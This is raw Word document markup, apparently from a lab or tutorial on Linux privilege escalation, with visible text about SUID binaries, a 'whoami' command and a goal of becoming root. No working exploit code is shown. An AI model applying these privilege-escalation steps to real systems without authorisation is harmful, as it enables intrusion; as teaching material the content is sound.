    <w:p w14:paraId="7B11716C" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRPr="00790EE9" w:rsidRDefault="00F21EC8" w:rsidP="00F21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  <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00790EE9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="4078F2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1AE81C39" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRPr="00790EE9" w:rsidRDefault="00F21EC8" w:rsidP="00F21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PK"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2547D120" w14:textId="68E2440B" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="003E0A7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Finds all programs on the system that run with root privileges when executed by ANY user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B595AF3" w14:textId="2132B1E2" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="003E0A79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F21EC8">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>A normal key opens your door. A SUID key opens EVERY door in the building.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DEE6BF" w14:textId="424178C5" w:rsidR="00F21EC8" w:rsidRPr="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="003E0A79">
      <w:pP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Find a security hole → Break through it → Prove you're now the all-powerful root user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574EB233" w14:textId="011737E1" w:rsidR="00F21EC8" w:rsidRDefault="00F21EC8" w:rsidP="003E0A7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72C7750C" w14:textId="77777777" w:rsidR="00F21EC8" w:rsidRPr="003E0A79" w:rsidRDefault="00F21EC8" w:rsidP="003E0A79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F21EC8" w:rsidRPr="003E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F1577"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="474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924BF9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B596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0A"/>
    <w:rsid w:val="001E2CF7"/>
    <w:rsid w:val="002B480A"/>
    <w:rsid w:val="002C4268"/>
    <w:rsid w:val="003E0A79"/>
    <w:rsid w:val="00413CC2"/>
    <w:rsid w:val="00501341"/>
    <w:rsid w:val="005C24AF"/>
    <w:rsid w:val="005D2F94"/>
    <w:rsid w:val="00BA4E70"/>
    <w:rsid w:val="00F2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192B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{552580B0-D5DF-42DD-B76C-195EFEB8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2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2CF7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Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="001E2C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2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2CF7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token">
    <w:name w:val="token"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="001E2CF7"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001E2C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0A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A7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41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d813de27">
    <w:name w:val="d813de27"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00F21EC8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00F21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2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1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1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8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9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2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5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192.168.32.1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32.133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 RASHID BUTT</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>WARDA RASHID BUTT</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-06T04:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-13T08:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>